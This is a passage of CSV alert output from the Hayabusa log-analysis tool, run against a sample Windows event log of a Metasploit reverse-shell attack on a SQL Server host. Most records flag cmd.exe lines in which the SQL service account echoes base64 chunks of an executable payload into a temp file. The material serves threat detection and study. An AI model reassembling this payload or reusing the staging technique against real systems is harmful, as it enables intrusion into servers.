BAAP8l8MBAAP9k5MBAAGgAAANNaAAMAR1tDQAASVmZdDPAw8P/Jcy+WQD/JYTB8gDMzMzMzMjMzMzMzMz/0szBQM8AAAAAAEMAAEIAAAAINAAAANEAAMcAAD4AAAAAAAAAPwAAAOUAfQAAACmdAAAAAJQ4xQAAAP0AKwAAAAAAAACXAAAAAACYAABMAAAAcgAAAAAAAAAAAAAAABIAAAAAAAAAAAAAAAAAAAAUAAAA7QC1AAAAYVEcAAAAewAAAAAAtgAAAPoAAAARAABN>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0xcf8 | User: Svc-SQL-DB01 | LID: 0x1304385",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:20.951 +00:00,mssql01.offsec.lan,4688,critical,InitAccess | Persis | PrivEsc,Suspicious Shells Spawn by SQL Server,,rules/sigma/process_creation_builtin/proc_creation_win_susp_shell_spawn_from_mssql.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:20.951 +00:00,mssql01.offsec.lan,4688,low,Disc,Redirect Output in CommandLine,,rules/sigma/process_creation_builtin/proc_creation_win_cmd_redirect.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:20.953 +00:00,mssql01.offsec.lan,4688,info,Evas,Suspicius Conhost Legacy Option,,rules/sigma/process_creation_builtin/proc_creation_win_susp_conhost_option.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:21.224 +00:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo AAAAAAAA9gAAeAAAAAAAAAAAAAAAAAAAAAC87QAAAAAA7wAAAAAAAAAAAAAAAAAAAAAAAAAAAI8AAAAAAAAAAAAAAAAAAL4AAAAhAAAAAAC7ADAAAAAANAAAAAAAqAAAAAAA+wAAACMAAAA9AAAAAAB3AAAAAAAAAAAAACwAAADRB6EAAAAAAAAAqwAA7OGiAAAAAAAAAAAAAAAAAOMAAAAAAAAAAAAAAAAAAAAAAFEAAABqAAAAfwC7AAAAAAAAAAAAAAAAAAAAM2cAAOkAAAAAXQAAAADvAAAAAAAAAAAaAAAAAAAAAAAAAAAAAAAAAAAALQAAAAAAAAAAAADNAAAAAAAAAAAAAAAAAAAhAAAAAG9eAAAAGQAAAAAAAAAgACsAAAAAARoAAAAAfAAAAEo6AAAAAEW+AH8AAAAAAADcAACFAAAAAAAAAAAAAADsAAAAdwAAAAAAAADuNgAAqgAAAAAAAAAAAHAAAMOHVWQAZmEAAAAAAAApALAAAD/8AAAAAADaAAAAAIQAAAAAaAAAAAAAAAAAAAAATQAAAAAAANdHAAAAiQDCAAAAAAAAAAAAAAAAAOkqAACBAAAAAMEAAAAAAAAAAAAAAAAAAAAAoAAAAABEAAAAAACAYTAAAAAAAAAAAAAA8ADDqtUAAAAAAAAATQAAAD8AAAAAAAAAAADUAAAAAAAAAPIAAAAAAADo4wAAAKQAAAAAAAAAACiYAAAA9osALQAAAAAAALYAAAAAAOEAAADjLwAaAAAAAAAAAI0AAAANAP4AAAAAAPthAAAAswBjAAAAVwAAAAAAAAAAAAAAAAAAAAAAALoAAAD5AABKAAAAAABsAAAAAAAAAAAAAAAAAADyAAAAAAAAAAAAvQAAAAAAAF4AAAAAAAAAAAAAzQAAAAAqAAAAXAB2owAAAAAAAABHugDXAAAAAAAXAAAATAAJKwAAAABuAPAAhgAAAACpvQAAAPiAAAAAAAAArgAAAAAAAADbAAAAALsAAOUAAAAAAHIAAAAAAJIAAAAAAt4AoQDuAFUAAAAAAAAA+QDoAAAAAAAAiQBLAAAAIwAAMAAAAAAAAEAVAOwAAADpAAAADCsAAOkAAAAAAAAAAAAAAADGAAAAAAAAaAAAAAAAAFkAAAAAAADsAAAAExIAAAAAAK0AAAAAAAAAAAAoAAAAcTkAAACyAABgAMIAADcAAAB3AAAAAAAAADYAAAAAAAAAAAAAAIxUYVgAAAAAAAAAAAAAAACtAAAAAAAAAADNAGoAAAAAAAAAAAAAAABtAFgAAAAAAAAAAAAAAAAAAAAPAG0AAABUAAAAAAAAAAAAAAAAAAAAQwAAAAAAAAAAAAAAAAAPAAAA4QCfAAAAAAAAAACBAAAAUAAAAAAAAAAAAAAAAAAAAPMA/gCRAAAAAgAAALaYNwCQAAAAGgAAW6QAPF0AAAAAAAAAAAAAAAAAAMEAWJIAABwAAABs>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0x824 | User: Svc-SQL-DB01 | LID: 0x1304385",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:21.224 +00:00,mssql01.offsec.lan,4688,critical,InitAccess | Persis | PrivEsc,Suspicious Shells Spawn by SQL Server,,rules/sigma/process_creation_builtin/proc_creation_win_susp_shell_spawn_from_mssql.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:21.224 +00:00,mssql01.offsec.lan,4688,low,Disc,Redirect Output in CommandLine,,rules/sigma/process_creation_builtin/proc_creation_win_cmd_redirect.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:21.226 +00:00,mssql01.offsec.lan,4688,info,Evas,Suspicius Conhost Legacy Option,,rules/sigma/process_creation_builtin/proc_creation_win_susp_conhost_option.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:21.498 +00:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo AADBAAAAAAAAAAAAAAAAAAAA2pcWAFUAAAAAAAAWAAAAAACGAABWAAASAABIAAAEAAAAAAAAAAAAAAAAANQAAADkAAAAALgAuiMAAAAAAOQAAACYAO8AAAAAAAAAAAAAAAAAAAAAAAAAAACKAAAAAAAAAAAgLQAAdwAAAAAAAAAAAAAAAGsAAAAAAI0AAAAAAGsAAADgAAAAAAAAAABYAAAAAO2gAAAA3gAAAAAAVSIAAABPAAAAXgAAAAAAAAAAAAAAAAAAAAAAAAB/1wCEADwAAAAAAJ0AAAAAALkAAAA+rjcAAAAAAAC0bwAAAACLAAAAAAAAAAAAAAAAAAB8AJ8AAAAjBQAAUAAAAAAAoAAAAAAAAAAAAAAAAAAAAGD0AAAAAADgAAAAAAAAAAAAAAB/AAAAAAAAAAAAAAAAAAAAAAAA8wAAAAAAAAAATgAAAAAAxmsAAAAAPwAAAAAAAAAAAFQAAABSDAAAp1oAAAAAAAAAKwAAAJMAnQDkAADRAAAhAAARAAAAAAAAAFwAXQCjpAAAAAAAAOsAAAAAAAAAAABLAAAAAAAAAAAAAAAAAAAOAAAhGhZPAAAAjM8AAHDPAAAAAAAAUs8AAEbPAAA6zwAAKs8AABjPAAAIzwAA8s4AAN7OAADGzgAAus4AAKrOAACSzgAAes4AAF7OAABOzgAAQM4AAPrLAAAKzAAAJMwAAD7MAABMzAAAXswAAGrMAAB0zAAAhswAAJrMAACyzAAAwMwAANrMAADyzAAADM0AACbNAAA+zQAAYM0AAGjNAAB6zQAAis0AAKDNAACwzQAAwM0AANLNAADgzQAA7s0AAATOAAAWzgAANM4AAAAAAADEyQAA2MsAAMbLAAC4ywAAqMsAAJjLAACEywAAeMsAAGjLAABYywAASssAAELLAAA4ywAAKssAABTLAAAKywAAAMsAAPbKAADsygAA4MoAANjKAADOygAAxMoAALTKAACkygAAmsoAAJLKAACIygAAfsoAAHTKAABsygAAZMoAAFzKAABSygAASMoAAD7KAAA0ygAAKsoAACDKAAAWygAACsoAAALKAAD6yQAA6skAAODJAADWyQAAzMkAAOzLAADczwAA0M8AAAAAAAC6zwAAsM8AAAAAAAAHAACABAAAgAkAAIA0AACADgAAgAwAAIAVAACAFwAAgAMAAIASAACACgAAgJcAAIBzAACAdAAAgG8AAIAAAAAAAAAAADaAwUoAAAAAAgAAAEoAAAAAAAAAACABAAAAAAAAAAAAAADgP3sUrkfheoQ//Knx0k1iUD8AAAAAAABQPwAAAAAAQI9AAAAAAAAA8D8AAAAAAAAAAI3ttaD3xrA+AAAAAB8AAAA7AAAAWgAAAHgAAACXAAAAtQAAANQAAADzAAAAEQEAADABAABOAQAAMgEAAFEBAAAAAAAAHwAAAD0AAABcAAAAegAAAJkAAAC4AAAA1gAA>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0xea0 | User: Svc-SQL-DB01 | LID: 0x1304385",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:21.498 +00:00,mssql01.offsec.lan,4688,critical,InitAccess | Persis | PrivEsc,Suspicious Shells Spawn by SQL Server,,rules/sigma/process_creation_builtin/proc_creation_win_susp_shell_spawn_from_mssql.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:21.498 +00:00,mssql01.offsec.lan,4688,low,Disc,Redirect Output in CommandLine,,rules/sigma/process_creation_builtin/proc_creation_win_cmd_redirect.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:21.500 +00:00,mssql01.offsec.lan,4688,info,Evas,Suspicius Conhost Legacy Option,,rules/sigma/process_creation_builtin/proc_creation_win_susp_conhost_option.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:21.772 +00:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo APUAAAATAQAAKG51bGwpAAAwMTIzNDU2Nzg5YWJjZGVmAAAAADAxMjM0NTY3ODlBQkNERUYAAAAAMDEyMzQ1Njc4OWFiY2RlZgAAAAAwMTIzNDU2Nzg5QUJDREVGAAAAAAAAAAAAACRAAAAAAAAAJMC4HoXrUbieP5qZmZmZmbk/FCcAADz5QAAZJwAALPlAAB0nAAAY+UAAHicAAAz5QAAmJwAA+PhAACgnAADg+EAAMycAAMj4QAA0JwAArPhAADUnAACM+EAANicAAGz4QAA3JwAATPhAADgnAAA4+EAAOScAABj4QAA6JwAABPhAADsnAADs90AAPCcAAND3QAA9JwAArPdAAD4nAACM90AAPycAAGz3QABAJwAAVPdAAEEnAAA090AAQicAACT3QABDJwAADPdAAEQnAAD09kAARScAAND2QABGJwAAtPZAAEcnAACY9kAASCcAAHz2QABJJwAAZPZAAEonAABA9kAASycAABz2QABMJwAABPZAAE0nAADw9UAATicAAMz1QABPJwAAuPVAAFAnAACo9UAAUScAAJT1QABSJwAAgPVAAFMnAABs9UAAVCcAAFz1QABVJwAASPVAAFYnAAAw9UAAVycAAAz1QABrJwAA7PRAAGwnAADM9EAAbScAALD0QAB1JwAAkPRAAPkqAACA9EAA/CoAAFz0QAAAAAAAAAAAAEphbgBGZWIATWFyAEFwcgBNYXkASnVuAEp1bABBdWcAU2VwAE9jdABOb3YARGVjAFN1bgBNb24AVHVlAFdlZABUaHUARnJpAFNhdAA8AkEAMAJBACgCQQAgAkEAGAJBAAwCQQAwMTIzNDU2Nzg5AAAAAAAAAAAAAAAAAgAAAgAAAAAAAAAAAAAAAAAAAAAAAAEBAgEDAwMDAwMCAQEBAQABAQEBAQEBAQEBAAMCAQICAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAwIDAwEDAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEDAgMDAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQD5AQEA/NDU2Nzg5Ojs8PUBAQEBAQEAAAQIDBAUGBwgJCgsMDQ4PEBESExQVFhcYGUBAQEBAQBobHB0eHyAhIiMkJSYnKCkqKywtLi8wMTIzQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBA>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0xfb0 | User: Svc-SQL-DB01 | LID: 0x1304385",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:21.772 +00:00,mssql01.offsec.lan,4688,critical,InitAccess | Persis | PrivEsc,Suspicious Shells Spawn by SQL Server,,rules/sigma/process_creation_builtin/proc_creation_win_susp_shell_spawn_from_mssql.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:21.772 +00:00,mssql01.offsec.lan,4688,low,Disc,Redirect Output in CommandLine,,rules/sigma/process_creation_builtin/proc_creation_win_cmd_redirect.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:21.774 +00:00,mssql01.offsec.lan,4688,info,Evas,Suspicius Conhost Legacy Option,,rules/sigma/process_creation_builtin/proc_creation_win_susp_conhost_option.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:22.047 +00:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo QEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEFCQ0RFRkdISUpLTE1OT1BRUlNUVVZXWFlaYWJjZGVmZ2hpamtsbW5vcHFyc3R1dnd4eXowMTIzNDU2Nzg5Ky8AAAAAAAAAAP////8qt0AAPrdAAKzIAAAAAAAAAAAAAB7LAADIwAAA8McAAAAAAAAAAAAAYs8AAAzAAADkxwAAAAAAAAAAAACWzwAAAMAAAITJAAAAAAAAAAAAAKTPAACgwQAAeMkAAAAAAAAAAAAAxM8AAJTBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIzPAABwzwAAAAAAAFLPAABGzwAAOs8AACrPAAAYzwAACM8AAPLOAADezgAAxs4AALrOAACqzgAAks4AAHrOAABezgAATs4AAEDOAAD6ywAACswAACTMAAA+zAAATMwAAF7MAABqzAAAdMwAAIbMAACazAAAsswAAMDMAADazAAA8swAAAzNAAAmzQAAPs0AAGDNAABozQAAes0AAIrNAACgzQAAsM0AAMDNAADSzQAA4M0AAO7NAAAEzgAAFs4AADTOAAAAAAAAxMkAANjLAADGywAAuMsAAKjLAACYywAAhMsAAHjLAABoywAAWMsAAErLAABCywAAOMsAACrLAAAUywAACssAAADLAAD2ygAA7MoAAODKAADYygAAzsoAAMTKAAC0ygAApMoAAJrKAACSygAAiMoAAH7KAAB0ygAAbMoAAGTKAABcygAAUsoAAEjKAAA+ygAANMoAACrKAAAgygAAFsoAAArKAAACygAA+skAAOrJAADgyQAA1skAAMzJAADsywAA3M8AANDPAAAAAAAAus8AALDPAAAAAAAABwAAgAQAAIAJAACANAAAgA4AAIAMAACAFQAAgBcAAIADAACAEgAAgAoAAICXAACAcwAAgHQAAIBvAACAAAAAABMBX2lvYgAAWAJmcHJpbnRmALcCc3RyY2hyAACOAV9wY3R5cGUAYQBfX21iX2N1cl9tYXgAAEkCZXhpdAAAPQJhdG9pAAAVAV9pc2N0eXBlAACeAnByaW50ZgAArwJzaWduYWwAAJECbWFsbG9jAABAAmNhbGxvYwAATwJmZmx1c2gAAEwCZmNsb3NlAACcAnBlcnJvcgAAVwJmb3BlbgCkAnFzb3J0APEAX2Z0b2wAwQJzdHJuY3B5AMUCc3Ryc3RyAADAAnN0cm5jbXAAXgJmcmVlAADIAF9lcnJubwAAegBfX3BfX3dlbnZpcm9uAG0AX19wX19lbnZpcm9uAACnAnJlYWxsb2MAxAJzdHJzcG4AAJsCbW9kZgAAvAJzdHJlcnJvcgAA4wJ3Y3NjcHkAAOYCd2NzbGVuAACzAF9jbG9zZQAA6AJ3Y3NuY21wAMMCc3RycmNocgBNU1ZDUlQuZGxsAABVAF9fZGxsb25leGl0AIYBX29u>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0x121c | User: Svc-SQL-DB01 | LID: 0x1304385",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:22.047 +00:00,mssql01.offsec.lan,4688,critical,InitAccess | Persis | PrivEsc,Suspicious Shells Spawn by SQL Server,,rules/sigma/process_creation_builtin/proc_creation_win_susp_shell_spawn_from_mssql.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:22.047 +00:00,mssql01.offsec.lan,4688,low,Disc,Redirect Output in CommandLine,,rules/sigma/process_creation_builtin/proc_creation_win_cmd_redirect.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:22.049 +00:00,mssql01.offsec.lan,4688,info,Evas,Suspicius Conhost Legacy Option,,rules/sigma/process_creation_builtin/proc_creation_win_susp_conhost_option.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:22.320 +00:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo ZXhpdADTAF9leGl0AEgAX1hjcHRGaWx0ZXIAZABfX3BfX19pbml0ZW52AFgAX19nZXRtYWluYXJncwAPAV9pbml0dGVybQCDAF9fc2V0dXNlcm1hdGhlcnIAAJ0AX2FkanVzdF9mZGl2AABqAF9fcF9fY29tbW9kZQAAbwBfX3BfX2Ztb2RlAACBAF9fc2V0X2FwcF90eXBlAADKAF9leGNlcHRfaGFuZGxlcjMAALcAX2NvbnRyb2xmcAAAHQNTZXRMYXN0RXJyb3IAAO4ARnJlZUVudmlyb25tZW50U3RyaW5nc1cATwFHZXRFbnZpcm9ubWVudFN0cmluZ3NXAAD1AUdsb2JhbEZyZWUAAAkBR2V0Q29tbWFuZExpbmVXAFYDVGxzQWxsb2MAAFcDVGxzRnJlZQCMAER1cGxpY2F0ZUhhbmRsZQA6AUdldEN1cnJlbnRQcm9jZXNzABoDU2V0SGFuZGxlSW5mb3JtYXRpb24AAC4AQ2xvc2VIYW5kbGUAwAFHZXRTeXN0ZW1UaW1lQXNGaWxlVGltZQC8AEZpbGVUaW1lVG9TeXN0ZW1UaW1lAADYAUdldFRpbWVab25lSW5mb3JtYXRpb24AALsARmlsZVRpbWVUb0xvY2FsRmlsZVRpbWUATgNTeXN0ZW1UaW1lVG9GaWxlVGltZQAATwNTeXN0ZW1UaW1lVG9UelNwZWNpZmljTG9jYWxUaW1lAEkDU2xlZXAA6gBGb3JtYXRNZXNzYWdlQQAAaQFHZXRMYXN0RXJyb3IAAIUDV2FpdEZvclNpbmdsZU9iamVjdABJAENyZWF0ZUV2ZW50QQAALANTZXRTdGRIYW5kbGUAABADU2V0RmlsZVBvaW50ZXIAAE0AQ3JlYXRlRmlsZUEAUABDcmVhdGVGaWxlVwCMAUdldE92ZXJsYXBwZWRSZXN1bHQAgwBEZXZpY2VJb0NvbnRyb2wAWgFHZXRGaWxlSW5mb3JtYXRpb25CeUhhbmRsZQAAUgJMb2NhbEZyZWUAXgFHZXRGaWxlVHlwZQBaAENyZWF0ZU11dGV4QQAAGQJJbml0aWFsaXplQ3JpdGljYWxTZWN0aW9uAHoARGVsZXRlQ3JpdGljYWxTZWN0aW9uAI8ARW50ZXJDcml0aWNhbFNlY3Rpb24AALgCUmVsZWFzZU11dGV4AAALA1NldEV2ZW50AABHAkxlYXZlQ3JpdGljYWxTZWN0aW9uAABRA1Rlcm1pbmF0ZVByb2Nlc3MAAFIBR2V0RXhpdENvZGVQcm9jZXNzAADfAUdldFZlcnNpb25FeEEAmAFHZXRQcm9jQWRkcmVzcwAASAJMb2FkTGlicmFyeUEAAJcDV3JpdGVGaWxlAKsCUmVhZEZpbGUAAIcCUGVla05hbWVkUGlwZQBLRVJORUwzMi5kbGwAAB0AQWxsb2NhdGVBbmRJbml0aWFsaXplU2lkAADhAEZy>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0xce4 | User: Svc-SQL-DB01 | LID: 0x1304385",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:22.320 +00:00,mssql01.offsec.lan,4688,critical,InitAccess | Persis | PrivEsc,Suspicious Shells Spawn by SQL Server,,rules/sigma/process_creation_builtin/proc_creation_win_susp_shell_spawn_from_mssql.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:22.320 +00:00,mssql01.offsec.lan,4688,low,Disc,Redirect Output in CommandLine,,rules/sigma/process_creation_builtin/proc_creation_win_cmd_redirect.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:22.322 +00:00,mssql01.offsec.lan,4688,info,Evas,Suspicius Conhost Legacy Option,,rules/sigma/process_creation_builtin/proc_creation_win_susp_conhost_option.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:22.593 +00:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo ZWVTaWQAQURWQVBJMzIuZGxsAABXU09DSzMyLmRsbAA5AFdTQVNlbmQANABXU0FSZWN2AFdTMl8zMi5kbGwAAMUBX3N0cm5pY21wAL8BX3N0cmR1cAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABAAAAZAAAAAEAAAABAAAAAQAAAAAAAACAw8kBAAAAAOALQQAyAAAAQgAAAEsAAABQAAAAWgAAAF8AAABiAAAAYwAAAGQAAAAlczogQ2Fubm90IHVzZSBjb25jdXJyZW5jeSBsZXZlbCBncmVhdGVyIHRoYW4gdG90YWwgbnVtYmVyIG9mIHJlcXVlc3RzCgAlczogSW52YWxpZCBDb25jdXJyZW5jeSBbUmFuZ2UgMC4uJWRdCgAAJXM6IGludmFsaWQgVVJMCgAAAAAlczogd3JvbmcgbnVtYmVyIG9mIGFyZ3VtZW50cwoAAFVzZXItQWdlbnQ6AEFjY2VwdDoASG9zdDoAAABQcm94eS1BdXRob3JpemF0aW9uOiBCYXNpYyAAUHJveHkgY3JlZGVudGlhbHMgdG9vIGxvbmcKAEF1dGhvcml6YXRpb246IEJhc2ljIAAAAEF1dGhlbnRpY2F0aW9uIGNyZWRlbnRpYWxzIHRvbyBsb25nCgAAAABDb29raWU6IAAAAAANCgAAQ2Fubm90IG1peCBQVVQgYW5kIEhFQUQKAAAAAENhbm5vdCBtaXggUE9TVCBhbmQgSEVBRAoAAABDYW5ub3QgbWl4IFBPU1QvUFVUIGFuZCBIRUFECgAAAEludmFsaWQgbnVtYmVyIG9mIHJlcXVlc3RzCgBuOmM6dDpiOlQ6cDp1OnY6cmtWaHdpeDp5Ono6QzpIOlA6QTpnOlg6ZGU6U3EAAABiZ2NvbG9yPXdoaXRlAAAAVG90YWwgb2YgJWQgcmVxdWVzdHMgY29tcGxldGVkCgAlcwoALi5kb25lCgBGaW5pc2hlZCAlZCByZXF1ZXN0cwoAAABhcHJfc29ja2V0X2Nvbm5lY3QoKQAAAAAKVGVzdCBhYm9ydGVkIGFmdGVyIDEwIGZhaWx1cmVzCgoAAAAKU2VydmVyIHRpbWVkIG91dAoKAGFwcl9wb2xsAAAAAGFwcl9zb2NrYWRkcl9pbmZvX2dldCgpIGZvciAlcwAAZXJyb3IgY3JlYXRpbmcgcmVxdWVzdCBidWZmZXI6IG91dCBvZiBtZW1vcnkKAAAASU5GTzogJXMgaGVhZGVyID09IAotLS0KJXMKLS0tCgBSZXF1ZXN0IHRvbyBsb25nCgAAACVzICVzIEhUVFAvMS4wDQolcyVzJXNDb250ZW50LWxlbmd0aDogJXUNCkNvbnRlbnQtdHlwZTogJXMNCiVzDQoAAAAAUFVUAFBPU1QAAAAAdGV4dC9wbGFpbgAAJXMgJXMgSFRUUC8xLjAN>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0x20 | User: Svc-SQL-DB01 | LID: 0x1304385",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:22.593 +00:00,mssql01.offsec.lan,4688,critical,InitAccess | Persis | PrivEsc,Suspicious Shells Spawn by SQL Server,,rules/sigma/process_creation_builtin/proc_creation_win_susp_shell_spawn_from_mssql.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:22.593 +00:00,mssql01.offsec.lan,4688,low,Disc,Redirect Output in CommandLine,,rules/sigma/process_creation_builtin/proc_creation_win_cmd_redirect.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:22.595 +00:00,mssql01.offsec.lan,4688,info,Evas,Suspicius Conhost Legacy Option,,rules/sigma/process_creation_builtin/proc_creation_win_susp_conhost_option.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:22.867 +00:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo 